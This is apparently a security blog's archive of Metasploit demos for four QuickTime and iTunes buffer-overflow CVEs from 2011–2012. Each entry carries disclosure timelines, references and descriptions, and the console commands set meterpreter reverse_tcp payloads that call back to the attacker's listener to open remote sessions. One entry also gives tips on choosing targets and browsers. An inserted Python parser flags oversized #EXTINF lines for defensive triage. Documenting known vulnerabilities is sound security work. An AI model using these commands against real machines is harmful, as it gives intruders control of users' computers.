Tag Archives: QuickTime

CVE-2012-3752 Apple QuickTime TeXML Vulnerability Metasploit Demo

Timeline :

Vulnerability reported to the vendor by Arezou Hosseinzad-Amirkhizi
Coordinated public release of the vulnerability on 2012-11-05
Metasploit PoC provided by juan vazquez on 2012-11-22

PoC provided by :

Arezou Hosseinzad-Amirkhizi
juan vazquez

Reference(s) :

CVE-2012-3752
OSVDB-87087
BID-56557
HT5581

Affected version(s) :

QuickTime 7.7.2 and earlier for Windows

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.2
Firefox 3.5.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow and then gain arbitrary code execution in the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, such as the font-table field, which is the one used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only bytes in the range 0x31-0x39 can be used in the overflow, so at the moment no DEP/ASLR bypass has been provided. The module has been tested successfully on the IE6 and IE7 browsers (Windows XP and Vista).

Commands :

use exploit/windows/browser/apple_quicktime_texml_font_table
set SRVHOST 192.168.178.26
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo

CVE-2012-0663 Apple QuickTime TeXML BoF Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by Alexander Gavrun
Vulnerability reported to ZDI by Alexander Gavrun
Vulnerability reported by ZDI to the vendor on 2011-10-21
Coordinated public release of the vulnerability on 2012-06-12
Metasploit PoC provided on 2012-06-27

PoC provided by :

Alexander Gavrun
sinn3r
juan vazquez

Reference(s) :

CVE-2012-0663
OSVDB-81934
BID-53571
ZDI-12-107
HT1222

Affected version(s) :

QuickTime version 7.7.1 and previous

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow and then gain arbitrary code execution in the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly: it stores user-supplied data on the stack without a length check, which results in the overflow.

Commands :

use exploit/windows/fileformat/apple_quicktime_texml
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

Apple iTunes 10 Extended M3U Stack Buffer Overflow Vulnerability Metasploit Demo

Timeline :

Vulnerability fixed in the product on 2012-06-11, without any notice of the vulnerability
Vulnerability discovered by Rh0
Public release of the vulnerability on 2012-06-20
Metasploit PoC provided on 2012-06-20

PoC provided by :

Rh0
sinn3r

Reference(s) :

EDB-ID-19322
HT5318
OSVDB-83220
Rh0

Affected version(s) :

iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3

Tested on Windows XP Pro SP3 with :

Apple iTunes 10.6.1.7
Apple QuickTime 7.72.80.56

Description :

This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7. When opening an extended .m3u file containing an “#EXTINF:” tag description, iTunes copies the content after “#EXTINF:” from a heap buffer to a stack buffer without appropriate length checking, writing beyond the stack buffer’s boundary, which allows code execution in the context of the user. Please note that before using this exploit you must have precise knowledge of the victim machine’s QuickTime version (if installed), and then select your target accordingly. In addition, even though this exploit can be used remotely, you should be aware of the victim browser’s behavior when opening an itms link. For example, IE, Firefox and Opera by default ask the user for permission before handing the itms link to iTunes. Chrome asks for permission and also displays a warning. Safari would be an ideal target, because it opens the link without any user interaction.
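The weakness above is an unchecked copy of whatever follows “#EXTINF:”. The following added example (not code from the Metasploit module or from iTunes) is a small extended-M3U parser with a defensive length bound on that description, usable for triaging playlist files before they reach a vulnerable player; the limit of 256 bytes and the sample playlists are assumptions constructed for illustration, not the real iTunes buffer size.

```python
import re

# Hypothetical safe bound for the text after "#EXTINF:", chosen for this
# example; it is NOT the size of the iTunes stack buffer.
MAX_TITLE_LEN = 256

# Well-formed extended M3U info line: "#EXTINF:<seconds>,<title>"
EXTINF_RE = re.compile(r"^#EXTINF:\s*(-?\d+)\s*,(.*)$")

def parse_extm3u(text, max_title_len=MAX_TITLE_LEN):
    """Parse an extended M3U playlist.

    Returns (entries, findings): entries is a list of dicts with
    duration/title/location, findings is a list of human-readable strings
    describing oversized or malformed "#EXTINF:" lines.
    """
    lines = text.splitlines()
    entries, findings = [], []
    if not lines or lines[0].strip() != "#EXTM3U":
        findings.append("missing #EXTM3U header")
    pending = None
    for n, raw in enumerate(lines, 1):
        line = raw.rstrip("\r")
        if line.startswith("#EXTINF:"):
            body = line[len("#EXTINF:"):]
            # The bytes copied by the vulnerable routine are exactly this body.
            if len(body) > max_title_len:
                findings.append(f"line {n}: #EXTINF description is "
                                f"{len(body)} bytes (limit {max_title_len})")
            m = EXTINF_RE.match(line)
            if m:
                pending = {"duration": int(m.group(1)), "title": m.group(2)}
            else:
                findings.append(f"line {n}: malformed #EXTINF line")
                pending = {"duration": None, "title": body}
        elif line.startswith("#") or not line.strip():
            continue  # header, comment or blank line
        else:
            entry = pending or {"duration": None, "title": ""}
            entry["location"] = line
            entries.append(entry)
            pending = None
    return entries, findings

def is_suspicious(text):
    """True when the playlist carries any oversized or malformed #EXTINF."""
    return bool(parse_extm3u(text)[1])

# Constructed sample playlists (not real files).
BENIGN = "#EXTM3U\n#EXTINF:213,Artist - Song\nhttp://example.invalid/song.mp3\n"
SUSPECT = "#EXTM3U\n#EXTINF:1," + "A" * 4000 + "\nhttp://example.invalid/x.mp3\n"
```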

Commands :

use exploit/windows/misc/itunes_extm3u_bof
set SRVHOST 192.168.178.100
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2011-0257 : Apple QuickTime PICT PnSize Buffer Overflow Metasploit demo

Timeline :

Vulnerability discovered by Matt “j00ru” Jurczyk and submitted to ZDI
Vulnerability reported to the vendor by ZDI on 2011-04-11
Coordinated public release of the vulnerability on 2011-08-08
Metasploit PoC provided on 2011-09-03

PoC provided by :

MC

Reference(s) :

CVE-2011-0257
ZDI-11-252

Affected version(s) :

All Apple QuickTime Player previous to version 7.7

Tested on Windows XP SP3 with :

Apple QuickTime Player 7.6 (472)

Description :

This module exploits a vulnerability in Apple QuickTime Player 7.60.92.0. When opening a .mov file containing a specially crafted PnSize value, an attacker may be able to execute arbitrary code.

Commands :

use exploit/windows/fileformat/apple_quicktime_pnsize
set FILENAME hollidays.mov
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

getuid
sysinfo